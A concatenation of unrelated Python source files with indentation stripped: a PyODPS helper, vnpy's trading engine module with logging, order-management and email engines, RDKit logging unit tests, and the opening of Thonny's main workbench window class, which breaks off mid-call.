def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
|
engine.py
|
"""
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.exchanges = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = ""):
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self):
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
UnitTestLogging.py
|
#
# Copyright (C) 2022 Kevin Burk
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""
unit testing code for various logging schemes
"""
import collections
import datetime
import io
import logging
import os
import sys
import tempfile
import threading
import time
import unittest
import rdkit
from rdkit import rdBase
class CaptureStream:
"""Helper class that captures output to a file descriptor"""
def __init__(self, fd):
self.fd = fd
self.old = os.dup(self.fd)
self.tmp = tempfile.TemporaryFile()
os.dup2(self.tmp.fileno(), self.fd)
def release(self):
self.tmp.seek(0)
result = self.tmp.read()
os.dup2(self.old, self.fd)
os.close(self.old)
self.tmp.close()
return result.decode('utf-8')
class CapturePython:
"""Helper class that captures Python output"""
def __init__(self, stream):
self.stream = stream
self.new = io.StringIO()
self.old = getattr(sys, self.stream)
setattr(sys, self.stream, self.new)
def release(self):
setattr(sys, self.stream, self.old)
return self.new.getvalue()
class CaptureLogger(logging.Handler):
"""Helper class that captures Python logger output"""
def __init__(self, module=None):
super(CaptureLogger, self).__init__(level=logging.DEBUG)
self.logs = collections.defaultdict(str)
self.devnull = open(os.devnull, 'w')
rdkit.log_handler.setStream(self.devnull)
rdkit.logger.addHandler(self)
def handle(self, record):
key = record.levelname
val = self.format(record)
self.logs[key] += val
return False
def release(self):
rdkit.log_handler.setStream(sys.stderr)
rdkit.logger.removeHandler(self)
self.devnull.close()
return self.logs
class CaptureOutput:
"""Helper class that captures all output"""
def __init__(self):
self.captured = {}
def __enter__(self):
self.osout = CaptureStream(1)
self.oserr = CaptureStream(2)
self.pyout = CapturePython('stdout')
self.pyerr = CapturePython('stderr')
self.pylog = CaptureLogger()
return self.captured
def __exit__(self, x, y, z):
for key, output in self.pylog.release().items():
self.captured[key] = output
pyout = self.pyout.release()
if pyout:
self.captured['sys.stdout'] = pyout
pyerr = self.pyerr.release()
if pyerr:
self.captured['sys.stderr'] = pyerr
osout = self.osout.release()
if osout:
self.captured['std::cout'] = osout
oserr = self.oserr.release()
if oserr:
self.captured['std::cerr'] = oserr
# Helpers for the non-threaded tests:
def timestamp(message):
ts = time.time()
if ts % 1 > 0.95:
# Avoid failures when seconds roll over:
time.sleep(0.06)
ts = time.time()
dt = datetime.datetime.fromtimestamp(ts)
return dt.strftime('[%H:%M:%S] ') + message
def expect_debug(message):
expect = timestamp(message)
rdBase.LogDebugMsg(message)
return expect
def expect_info(message):
expect = timestamp(message)
rdBase.LogInfoMsg(message)
return expect
def expect_warning(message):
expect = timestamp(message)
rdBase.LogWarningMsg(message)
return expect
def expect_error(message):
expect = timestamp(message)
rdBase.LogErrorMsg(message)
return expect
# Helpers for the threaded tests:
nthreads = 5
nlogs = 50
def go(func, *args):
thread = threading.Thread(target=func, args=args)
thread.start()
return thread
def LogDebugs(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogDebugMsg("Debug %d.%d: My dog has fleas!" % (t, i))
def LogInfos(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogInfoMsg("Info %d.%d: Everything is fine." % (t, i))
def LogWarnings(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogWarningMsg("Warning %d.%d: Every good boy does fine." % (t, i))
def LogErrors(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogErrorMsg("Error %d.%d: Intruder detected!" % (t, i))
def LogAllLevels(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogDebugMsg("Debug %d.%d: Headin' out..." % (t, i))
rdBase.LogInfoMsg("Info %d.%d: There is no cow level." % (t, i))
rdBase.LogWarningMsg("Warning %d.%d: Nuclear launch detected!" % (t, i))
rdBase.LogErrorMsg("Error %d.%d: We require more vespene gas." % (t, i))
def RunOneThreadPerLevel(nthreads):
threads = []
for i in range(1, nthreads+1):
threads.append(go(LogDebugs, nlogs, i))
threads.append(go(LogInfos, nlogs, i))
threads.append(go(LogErrors, nlogs, i))
threads.append(go(LogWarnings, nlogs, i))
for t in threads:
t.join()
def RunManyThreadsPerLevel(nthreads):
threads = []
for i in range(1, nthreads+1):
threads.append(go(LogAllLevels, nlogs, i))
for t in threads:
t.join()
class TestLogToCppStreams(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToCppStreams()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {'std::cout': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nlogs)
self.assertEqual(cout.count('Info'), nlogs)
self.assertEqual(cerr.count('Warning'), nlogs)
self.assertEqual(cerr.count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nthreads * nlogs)
self.assertEqual(cout.count('Info'), nthreads * nlogs)
self.assertEqual(cerr.count('Warning'), nthreads * nlogs)
self.assertEqual(cerr.count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nthreads * nlogs)
self.assertEqual(cout.count('Info'), nthreads * nlogs)
self.assertEqual(cerr.count('Warning'), nthreads * nlogs)
self.assertEqual(cerr.count('Error'), nthreads * nlogs)
class TestLogToPythonLogger(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToPythonLogger()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug')
self.assertEqual(captured, {'DEBUG': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info')
self.assertEqual(captured, {'INFO': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning')
self.assertEqual(captured, {'WARNING': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error')
self.assertEqual(captured, {'ERROR': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
self.assertEqual(captured['DEBUG' ].count('Debug'), nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
self.assertEqual(captured['DEBUG' ].count('Debug'), nthreads * nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nthreads * nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nthreads * nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
self.assertEqual(captured['DEBUG' ].count('Debug'), nthreads * nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nthreads * nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nthreads * nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nthreads * nlogs)
class TestLogToPythonStderr(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToPythonStderr()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nlogs)
self.assertEqual(output.count('Info'), nlogs)
self.assertEqual(output.count('Warning'), nlogs)
self.assertEqual(output.count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nthreads * nlogs)
self.assertEqual(output.count('Info'), nthreads * nlogs)
self.assertEqual(output.count('Warning'), nthreads * nlogs)
self.assertEqual(output.count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nthreads * nlogs)
self.assertEqual(output.count('Info'), nthreads * nlogs)
self.assertEqual(output.count('Warning'), nthreads * nlogs)
self.assertEqual(output.count('Error'), nthreads * nlogs)
class TestWrapLogs(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToCppStreams()
rdBase.WrapLogs()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cout': expect
})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
import gettext
from threading import Thread
from tkinter import ttk, messagebox
from typing import (
Any,
Callable,
Dict,
List,
Optional, # pylint: disable=unused-import
Sequence,
Set, # pylint: disable=unused-import
Tuple, # pylint: disable=unused-import
Type,
Union,
cast,
) # pylint: disable=unused-import
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
get_runner,
running,
ui_utils,
assistance,
languages,
get_shell,
is_portable,
)
from thonny.code import EditorNotebook
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_windows,
running_on_rpi,
copy_to_clipboard,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
THONNY_PORT = 4957
SERVER_SUCCESS = "OK"
SINGLE_INSTANCE_DEFAULT = True
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self, server_socket=None) -> None:
thonny._workbench = self
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_configuration()
self._init_diagnostic_logging()
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._add_main_backends()
self._init_theming()
self._init_window()
self.add_view(ShellView, _("Shell"), "s", visible_by_default=True, default_position_key="A")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link()
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
if server_socket is not None:
self._init_server_loop(server_socket)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE_NAME)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]
self.set_default("general.single_instance", SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
def _init_language(self) -> None:
"""Initialize language."""
language_code = self.get_option("general.language")
if language_code in languages.LANGUAGES_DICT:
path = os.path.join(os.path.dirname(__file__), "locale")
language = gettext.translation("thonny", path, [language_code])
language.install()
def _get_logging_level(self) -> int:
if self.in_debug_mode():
return logging.DEBUG
else:
return logging.INFO
def _init_diagnostic_logging(self) -> None:
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
root_logger = logging.getLogger()
log_file = os.path.join(THONNY_USER_DIR, "frontend.log")
file_handler = logging.FileHandler(log_file, encoding="UTF-8", mode="w")
file_handler.setFormatter(logFormatter)
file_handler.setLevel(self._get_logging_level())
root_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logFormatter)
console_handler.setLevel(self._get_logging_level())
root_logger.addHandler(console_handler)
root_logger.setLevel(self._get_logging_level())
import faulthandler
fault_out = open(os.path.join(THONNY_USER_DIR, "frontend_faults.log"), mode="w")
faulthandler.enable(fault_out)
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
